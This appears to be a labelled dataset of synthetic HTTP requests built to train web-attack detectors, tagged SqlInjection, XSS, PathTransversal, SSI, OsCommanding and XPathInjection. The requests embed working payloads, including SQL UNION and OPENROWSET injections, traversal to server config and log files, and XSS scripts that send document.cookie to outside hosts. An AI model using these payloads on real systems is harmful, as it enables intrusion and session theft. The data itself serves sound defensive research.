Referer: http://www.hnFse.gov/tsar9/ct5f/dreLoL/dhat.cgi
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 0.0; os-Iw; rv:7.1.7) Gecko/36157045
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: leeel/1.3 112.88.25.120, 5.5 www.bbronh.htm, FTP/3.2 57.113.59.241
Transfer-Encoding: hzctn; adn5Lv=esftana
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37806
Start - Id: 42247
class: SqlInjection
GET /o5yXAfmLjg@-QtfBs.HI/rke/5YDON/tr2k6iHrv_2MxU0.jpg?goo=aru0su8l&r9ess9Huhh=5VWFZp&Izw7hcataoZ0a=Ah&n3noheenais=02&psEopZrlscIGtsa=%27%29+++++UNION+ALL++SELECT+++0855++FROM++1eyzq++WHERE++++%28+%27%27++%3D++++%27&Lebtrnoa=5487854753&axGtspbexu=6&tds=4970&4Oqmoe=at&LWMEcmdinsertfWm6fJ=iuq&aIyegsezydy=02&erdlfaea=%3Cb1&icaEkelnypj=5&npotink=a8eRtum&shsm8l2ToaoWy=1 HTTP/1.1
Host: www.k5sr8binag.it:81085
Connection: elecnp
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.4, gzip, compress;q=0.7
Accept-Language: inestb-cc8err, aea8-mmtij
Cache-Control: lutsasd='hKteee'
Client-ip: 83.53.205.169
Cookie: msrwjR7rni=2064;aonselr=98698
Cookie2: $Version="8"
Date: Thu, 26 Apr 07 13:06:04 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: ppnuhf@cKraaqblss.ch
If-Modified-Since: Sat, 17 May 08 16:55:56 GMT
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: "pnplux.2entWA86i"
If-None-Match: *
If-Range: Fri, 27 Jan 06 20:28:41 GMT
Max-Forwards: 17
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM c3VhdG9yZTVuZUlhaXRlZHlOUnZ3dXRkcGZzaHFoYWVFd2U=
Authorization: NTLM ZWxoZWF1aWl0MW5ldE0wZHcxd3FzeWxhc25udmZ3dXlzcGllcjVyd3NsdWhueXN4
Range: 4539-14148,-19,934-
Referer: http://www.rairttja.it/6nseKE/atwi/tsopsy/a0exte.sh
TE: chunked
Trailer: Accept-Language
User-Agent: uans (9iMy2q; rOvIC-A; tdmX4S7; eo0_qbT0)
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: rRra/8.9, int0ly/0.7
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42247
Start - Id: 36279
class: PathTransversal
GET /dlyO4o/TRMBG/cmdvn-o/dpdemiiuMaa2efedoml.cfm?e1h=50obSzc&lT=g0+ehdzat&ansir=6010897&h1Rl6hmppsners=%2Fetc%2Fhttpd%2Fhttpd.conf&XnullMX1L_=wiiotnsadoaeiae&Wdaxterm0@4LPzA_=46&sfn=ai.pQCv2w&yrlwBmeyfqt=68vJMo%40&li=%3Ae&s3gtwh=ottIen&actA50rNi8zj=now%29d5hTnoes&x0FVlKmEJe5Y=91091695&AYO8HP8LsZ=tkte&bisnJhhri=a_q189L.2E9 HTTP/1.1
Host: www.fhtfk9.be
Connection: keep-alive
Accept: text/html, audio/basic;q=0.5
Accept-Charset: koi8-r;q=0.1
Accept-Encoding: *
Accept-Language: aZ2dia-hirtw;q=0.8
Cache-Control: max-stale
Client-ip: 114.100.144.6
Cookie: gnt73qfo=57;l6=s~ :;icplavsdfwsSnT=z34;nlnnoAGCb6bsvwe=T9haunocldEKqo0r68;ekdzevnaLh=Meconnecte;enrXs=546
Cookie2: $Version="13"
Date: Tue, 14 Nov 06 17:49:33 UTC
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Mon, 01 Oct 07 20:33:13 GMT
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: Sun, 16 Dec 07 01:07:22 GMT
Max-Forwards: 067
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: nn1f lpedplel=eTmto
Range: 507970-,9199-
Referer: /ahet/Sinlsea/iissh/irnR.php3
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/3.7 (compatible; Konqueror/8.1; Solaris; lashts; 401bg; itods)
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 0.7 www.utnH.tiff, FTP/4.7 38.80.154.241
Transfer-Encoding: identity
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
Warning: 581 90.255.148.33 "sluBdaenaa0lrsll" "Sat, 13 May 06 19:24:02 CET"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36279
Start - Id: 47217
class: XSS
GET /eYS/deesh/tXjr@q1FLpx4_QMWp/yr3csitlohsjtt.shtml?7ltnteA6nethhn=Rdizcsidawj9&enntinbdad=eetaIwaetz4wnse&niBoh=ZVueefsrt8lwarfcfe&rtindgtel3enl=s-9%2Fh&tyArFtnrn5eeh=w1bs7%40py0f&BoY8k_DF=i8T.ZTnjx&nwnngxatwtwnwa=%3E%3F&esaitswehakyvep=misabodh&Sg=420243423&eyYiat=aW6FJX&gebAmgcr=e%26f%29qb2zwunion&t1haacdetDeu=%3Cscript++%3Ealert++++%28wai3cinajynoe3s.mfrim%29%3C%2Fscript%3E&ibo=ismQt&lieen9=nNtlAFFQ-1&radtSi=62 HTTP/1.1
Host: 65.28.31.253
Connection: 4nwawhmt
Accept: audio/*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: i8Onrt-r077celn, rlnyo-d, dq-ioa;q=0.0, 5hdo0wec-oyGlznoM, arnIa-bbixt
Cache-Control: no-transform
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Tue, 01 Aug 06 18:31:08 GMT
ETag: "sffq97EglwyE3Ups"
Expect: bpHcbrce
From: sHag@lasiBra.be
If-Modified-Since: Sun, 21 Jun 09 11:33:06 CET
If-Unmodified-Since: Mon, 14 Sep 09 21:01:00 UTC
If-Match: "tRlkqTuA.5ZfWZfFKs"
If-None-Match: "nlhCB0ggw20B2A.X0ig-"
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 6997
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM aXdzb2U5d3Rlcm9zd2RFSWVhZDBhY3Qxem9lbU5tb3J0d2docmhybnR6dG9zZQ==
Range: 4321-2
Referer: http://h8Zy2rrd.it/au3tr/ispne.jsp
TE: gzip
Trailer: Range
User-Agent: Mozilla/7.3 (X11; U; Solaris 1.9; i2-ya; rv:3.9.1) Gecko/28783340
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/9.7 4.114.234.99, 0.3 214.217.195.236
Transfer-Encoding: gzip
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47217
Start - Id: 40438
class: SSI
POST /Ghttpsq/w96AYQ6W9JT05x/52jwO/mZ-ZlG2@S/aget/o7teshqwsrshq2oi/S-0Q0_ebn444/ssyeeweopOst7a/2@Ks_p.WMdyE-Kg@LH.tiff? HTTP/1.0
Content-Length: 260
Content-Language: spesui2
Content-Encoding: gzip
Content-Location: http://www.uSsxoe3i.de/t4teeE/eEzhwr6T/bI7ehl3S/ue1me/let2bih.bin
Content-MD5: YUlhc25vdHZ0amd0dGJ0RQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 01 Jul 04 04:37:09 GMT
Host: www.irknjhIEm.cz
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 101.154.247.123
Cookie2: $Version="51"
Date: Thu, 14 Jun 07 07:30:59 CET
From: e3lr@eoyoSaeit.st
If-Unmodified-Since: Thu, 15 Apr 10 08:42:27 GMT
If-None-Match: "H3OZFX3xHGbFMFsawp"
If-Range: Thu, 19 Feb 04 16:39:07 UTC
Max-Forwards: 542
Referer: /mgkdUa/tdehhtw/tOehme/rtkb.rar
User-Agent: 1oredeHyl (sd6YkJ; o9pCukXzF; urNWNetAU0; mupwZ@jR.)
Transfer-Encoding: ywfbOE; nxtu=tbeh
Warning: 680 www.njen.png "MjOsO" "Tue, 22 Jul 08 24:29:22 CET"

tnremteealHfDln=99&2tiupt6d=ae2eg(io4natx8[toe4u&asxhnhbhi1Jcal=ruemhaving&fSphxanonScsnm=ioptrd&ibdzetnrHsfs=62191277&cvFqvCxBgroup by=<!--    #include    virtual="d:\windows\autoexec.bat" -->&maseais6avea=t6a)htacces&d3e7hn3ara=9479

End - Id: 40438
Start - Id: 47278
class: XSS
GET /tmMdotiaab/us6smeLwlsfeuheh/lr4oh/h9szolr/Gtatpaxzic8ltdeoatH/ejmPtFjuS.asp?hrrenuoia=ior3n%3Eq+Bh++4OsA+&n8af=elrH&dhDe=04935452&26SGTiUinputoB=tnonduo&pjNjirbIozoqh=02560&enThranoid=eurne&dSerAgaecldidMo=%3Ca++++href%3D%22javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.asetnt.com%2Fcgi-bin%2Fisve.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E&ir5=2oeagrlanT&lca2eIe72=sj7+&vdmoeHaiuryb6=soepOtlttgn8 HTTP/1.0
Host: 210.13.164.91:80
Connection: sCSslm
Accept: text/plain, text/html;q=0.4, image/*
Accept-Charset: euc-cn, windows-1250, euc-cn, x-mac-japanese
Accept-Encoding: gzip
Accept-Language: *;q=0.1
Cache-Control: max-age=5121
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Wed, 06 Jul 05 09:15:23 GMT
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Sun, 26 Oct 08 23:45:13 UTC
If-Unmodified-Since: Thu, 26 Nov 09 01:38:15 UTC
If-Match: "jF_P0iLzYK_9X3XGzEyq"
If-None-Match: *
If-Range: Sat, 18 Nov 06 01:53:05 UTC
Max-Forwards: 98
MIME-Version: 2.2
Pragma: dhe6='sot3awlR'
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: NTLM cm5uaVRpaHRsc2RjbGNlc2N6aHNjUmxwZGtta28xYXNvdGF5aWtpYWlodWE=
Range: 3-25949,-0524
Referer: /tuonrrcn/t2flq.htm
TE: gzip;q=0.8,trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: eE2tsene
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 581x8741
Via: 2.0 87.155.190.119, 7.7 www.eioste5.css:2, HTTP/5.9 www.ipSxtt.png:9
Transfer-Encoding: compress
Upgrade: enoe/1.7, jmbut/1.3, oeda/2.9, euyr2/9.2, lnTo/7.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 972806638968754
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47278
Start - Id: 36483
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: 137.206.85.60
Connection: rpIW9
Accept: */*;q=0.1
Accept-Charset: utf-8, iso-8859-6, cp-932, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: Eeifbd-aoA
Cache-Control: min-fresh=723
Client-ip: 221.93.140.194
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Wed, 30 Jan 08 09:57:30 GMT
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Fri, 02 Jan 09 04:51:22 CET
If-Unmodified-Since: Tue, 17 Jun 08 13:42:44 GMT
If-Match: "z5AQwTQPBCnNcMg"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Sun, 29 Apr 07 23:18:13 GMT
Max-Forwards: 4578
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Basic MnJ1eHptN2U6dG1ha3NldDU=
Range: 998505-,-0540,815-
Referer: http://eoxFs.ch/5stft.jsp
TE: gzip;q=0.6,gzip;q=0.6,chunked
Trailer: Authorization
User-Agent: Mozilla/1.2 (Windows; U; WinNT 8.3; re-Ao; rv:3.8.3) Gecko/14696323
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1357x6667
Via: shi/6.3 124.88.9.56:7176, qcw8e9/4.8 www.egSt.tiff:69499, 4.7 www.2cire.shtml
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36483
Start - Id: 41649
class: SqlInjection
GET /maa6seedseaI.aspx?M8bs=+++++OR+++2+%3E+++1&lettrstwh=traIaatdinn&vilsettree=euE&7ec4e2obaltacee=eX0 HTTP/1.0
Host: www.arhbn0e9a.de:80
Connection: j3tIG
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: max-age=8807
Client-ip: 99.181.248.40
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="52"
Date: Sat, 15 Oct 05 03:06:34 GMT
ETag: W/"DYrqCWSJ5vu8_ST"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Mon, 20 Aug 07 05:57:30 CET
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: "BW78L_@bXg@FhfPs9g3o"
If-Range: "b7a4y_incQ3X85IN"
Max-Forwards: 4982
MIME-Version: 7.4
Pragma: y1nyat=Ti1be
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: NTLM czFmZHVhbW9pc281c2lyMWVyZUVoaWxhNU9ucWVsczB0TUJuOHVlbGJMaWhl
Range: -11289
Referer: /iweetnl/phbyee.swf
TE: gzip;q=0.8,trailers,chunked
Trailer: Range
User-Agent: Mozilla/4.2 (X11; U; Solaris 6.3; is-ey; rv:8.9.6) Gecko/70113033
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 355x361
Via: HTTP/4.3 38.129.21.85
Transfer-Encoding: compress
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41649
Start - Id: 36310
class: PathTransversal
GET /2ihfsnentiikwinehY.jpg?etnest=t-T4.&rea4Iqaa=+&ilr=rI6itPBI&kgoYEsami=systemp5z&hyAZGexecu0M=+ot82likeple+xp_rjE&qofe8ex=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&oarye=oCTSkdiur&4rHees9usd6h=%3Dbxmlefrom HTTP/1.0
Host: 136.55.74.44
Connection: 6pes
Accept: image/jpeg;q=0.3, application/*
Accept-Charset: x-mac-japanese, shift_jis;q=0.5, windows-1250;q=0.7, windows-1250
Accept-Encoding: 
Accept-Language: txggo-sde6;q=0.8, rasnIde-t;q=0.0, ku-srmsi0, n-x;q=0.3
Cache-Control: min-fresh=73
Client-ip: 145.8.91.154
Cookie: v3offnn=eardla;GnetcatPfR=rWIBHlH_;aapOhd84deopG=pwaqjr;logYyg.kg=speo7rtmctan1eodt;4fvNroOowls1s=eAes;o2ikyysT=h1
Cookie2: $Version="25"
Date: Wed, 26 Jul 06 05:42:09 UTC
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Sat, 18 Nov 06 02:09:20 CET
If-Unmodified-Since: Sun, 06 Mar 05 22:16:42 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Apr 04 07:49:41 GMT
Max-Forwards: 693
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: evam nee2qcse=getlnisr
Range: -24492,6727-90720
Referer: /i1ja/oa4n.html
TE: chunked,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/8.7 (compatible; Konqueror/2.4; SunOS sun4u; tomotrr8)
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36310
Start - Id: 48988
class: XPathInjection
GET /Soss/egtennefl/8bKD/rouaw6arussie/r@hnDuunionD0_PcdjG/uot.jpg?sXH7dkXBnetcatwinntu0=tb0ynaEea&owGsumebete=%3ER9tp&rswi=a%2Fiqn%2Fs7mkt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D694%5D+++or++++%27As%27+++%3D+++%27 HTTP/1.0
Host: www.cwnmpdtns.st
Connection: close
Accept: image/gif, text/*;q=0.5, audio/*;q=0.3
Accept-Charset: cp-932, x-mac-greek, iso-8859-6, windows-1250;q=0.8, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 102.111.118.138
Cookie: qvPCG=5NuGP;usrNDlGgKD=tlCF_SBw6mG;dsaourj=886;6t4Tooleatrih=21187796;ecam=std+;0oEf9a9wnQsH3ar=lee-
Cookie2: $Version="7"
Date: Thu, 07 Jun 07 09:40:45 GMT
ETag: "70kW_gEe3UWRXxMlo"
Expect: ochaoiy
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Fri, 18 May 07 03:44:44 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: *
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: *
Max-Forwards: 91
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest realm
Range: 23-,057-,45-
Referer: /16tts.png
TE: trailers,gzip,gzip
Trailer: From
User-Agent: Mozilla/9.9 (compatible; Konqueror/4.4; Mac OS X; iladg)
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: 6.0 251.34.148.183:972, 5.3 68.234.212.209:0
Transfer-Encoding: compress
Upgrade: aivsar/6.5, Aensn/2.2
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48988
Start - Id: 35424
class: SqlInjection
GET /cZbGGqsUA5HTWj.jpeg?hnEcTgmytYt5s=5Z9mXHKi&Ncvx5gab=%27+++group++by+++++users.id++++having++++2%3D2&2eTOAyik=it4yc%3Ci7E8&erEirid=nojeRpnm%29wp%2Bbee&pGJtmp=71445718&Lsrssxniteatn=41&xtp5bhPeti=63&welnnhoiAeia=5823 HTTP/1.0
Host: 167.45.153.2
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate;q=0.1
Accept-Language: fghk-kntaw;q=0.4
Cache-Control: max-stale=62965
Cookie: eleenitbg=ue
Date: Sat, 06 Nov 04 08:10:28 UTC
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: edzd=keea
If-Modified-Since: Sun, 01 Jul 07 24:24:51 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: "PYwkduxR3xQ6IRotd-C"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 01
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic c2lqb3c6c3lmd2hlSm8=
Authorization: NTLM cm9xZGVyb3JydW9mU2l4NElzeHJMaWVsaWwzYmF0Z2E2
Referer: /hih1.conf
Trailer: TE
User-Agent: Mozilla/5.7 (compatible; nghot; Win 9x; cpm72pO3; ttayhFhnoO; 9llnigi56n)
UA-OS: Linux
UA-Pixels: 4111x1385
Via: 2.3 www.peta.shtml
Transfer-Encoding: ve4tr
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------

null

End - Id: 35424
Start - Id: 46762
class: XSS
POST /lPqRzgP33upRfy/PQ6pdIuF1J-H4/dyZCkMZufjQ/bfu@30XuDf.c/lFKZf9uiI5ZM_eOieW/nt/eivbsqTm_PEjOfLXjZbH/oeTmqx_hUBQ5zqtwT@w/iefaeetMChtcesd.swf? HTTP/1.0
Content-Length: 319
Content-Language: cltisTt,ee
Content-Encoding: deflate
Content-Location: http://www.elIRsn.de/olqTlao/te5pmNpl/kntestql/elgctets/8ciCo.dll
Content-MD5: dWVjdG5yMm5leHNrdDV4bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Aug 09 17:16:15 CET
Last-Modified: Mon, 04 Jan 10 24:32:48 CET
Host: 251.251.38.93
Connection: keep-alive
Accept: video/mpeg;q=0.4, application/*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.8, x-mac-icelandic;q=0.9, iso-8859-7;q=0.4, big5;q=0.1
Accept-Encoding: identity;q=0.0, deflate;q=0.2, identity, gzip;q=0.4, deflate
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 202.152.82.23
Cookie2: $Version="609"
Date: Sun, 09 Mar 08 11:10:22 GMT
ETag: W/"Gv6XcS6scpY.TFmT"
Expect: tnqid
If-Modified-Since: Thu, 31 May 07 21:50:24 GMT
If-Unmodified-Since: Sun, 25 Feb 07 04:45:13 CET
If-Match: *
If-None-Match: "cVWUYV5JmqcW8Tvvvz"
If-Range: *
Max-Forwards: 3
Pragma: no-cache
Proxy-Authorization: Basic Z212dGU6ZXJyZWRkZQ==
Referer: http://www.0o9utay.net/oedeun/yviy/hm9h.js
TE: gzip;q=0.8,trailers,gzip
User-Agent: Mozilla/3.5 (X11; U; Unix 6.4; So-lE; rv:5.0.7) Gecko/58346385
UA-Color: color32
UA-Pixels: 1199x1516
Transfer-Encoding: deflate
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"

iena=cPcUQ7KzJ&si7iA=eokoyupE&ERbformy=79175&p9q=access_logn$iS&_servicesByfKHWQ=i4a18jM4Z&gaxiwbk=88&ltdntitwhlUo=ccilwneanl&TOuaENRVt=iwle&Qx3H=ueea&4mocha9thH3yi=e7tuaeeu&dhai=5&tlP9opte=Eaw4oh7ee4eh0y&9lbxr=athl60seoahl0pep&ur1=<img  src    =  "    javascript:   [alert('emntohe');] "  >

End - Id: 46762
Start - Id: 47838
class: XSS
GET /Gvgt9/e@9RDdSn3uz/sqmkwKCobrZ/zbU/ojhbHy3eYvhkr6Nb/tinde7u/qop/RtidqacceptZCOtmpevQcwgetlib/8thdutTiesasa.tiff?uTgaho3=ciEnullc&rsvgRuseci=flin&mbIgaotoslenmuq=bs&oyEok1djdaa=ausebi9unitsni&dy=68360831&i6N=script&Roiuiiar1jtdr=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F114.166.219.4%2Fesense.php4%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&ae2o=35526781&0qOgx=stv&Ml3slITlmI0p=36 HTTP/1.0
Host: 96.182.105.236
Connection: tlYeM
Accept: */*;q=0.2
Accept-Charset: x-mac-icelandic, iso-8859-2, euc-tw;q=0.7
Accept-Encoding: 
Accept-Language: mqeHedU-Nl, tvuneMee-zehegi;q=0.5, adbwnido-P32ua;q=0.1
Cache-Control: max-stale
Client-ip: 145.49.48.15
Cookie: T7-x3qSps=ccCY0tA6;etn6l4i7ACe=4068
Cookie2: $Version="459"
Date: Tue, 16 Oct 07 03:18:43 CET
Expect: hnkndi8=thtmdr
From: pMtHteat@h2a4E.de
If-Modified-Since: Thu, 05 Jan 06 05:28:54 CET
If-Unmodified-Since: Mon, 19 Apr 04 13:39:31 GMT
If-None-Match: *
If-Range: "L1pBSGEMNIT-en7_6M"
Max-Forwards: 71
MIME-Version: 8.7
Pragma: en='du'
Proxy-Authorization: NTLM TDNybjkwYkRubGFlcWlucmU0c2F0ZWNudmd1dHVvbnNzQ1dtenNoZDNtc2U=
Authorization: 0omh a0ocpoA=YS4eu
Referer: /uOho/7nutcai2.dll
TE: chunked
Trailer: Transfer-Encoding
User-Agent: ernA0oTnm/2.9
Via: 7.7 www.sy2r.jpg, 9.2 167.125.80.246
Transfer-Encoding: gzip
Upgrade: dse/3.9, erre/3.1, jAtMM/7.7, eexzD/7.4
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47838
Start - Id: 41613
class: SqlInjection
GET /oqoUnodeI@un/bU/cSUhNfCuWl/pVzx@-mFKUat/i2jolestsqusiet/csr3dhmeoyuaainEal3a/nlaY/xw3cKWCGn7-/IjJvar1dWLkY/t7uN7/ePsNaq_/ehwsi3ScniTodtss.gif?gyna=lyu&e.__BzrLxd58=3605890&pdilTihgd=94095&lsosadesezttn=9346&feeea99arelas=%3B+++select+++*++from+++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Di0t%3Bpwd%3DiEgezunain%3BNetwork%3DDBMSSOCN%3BAddress%3D227.112.119.196%2C28861%3B%27%2C%27select+++++*+++from+lqteehni%27+++%29&pHWe8ynyeaahs=6p4A HTTP/1.1
Host: www.gaetsu.gov:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Sat, 14 Oct 06 10:28:55 CET
ETag: "5AYEIKIO38UMnPD"
Expect: tnEro1
From: tcssd@oays6you.com
If-Modified-Since: Fri, 12 Oct 07 03:49:35 UTC
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: "YTszkwGODgEAaKFgM@"
If-Range: "-BfStDLw0qV@ng3N.Ri"
Max-Forwards: 805
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: In9rk gyigt=48zd
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: http://www.posAm.fr/trm4haee/tCGm.jpg
TE: gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/9.5 (X11; U; Linux i586 4.0; hn-aS; rv:2.9.7) Gecko/22656566
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/1.1 www.p4oseg.html, 9.5 166.249.120.111
Transfer-Encoding: gzip
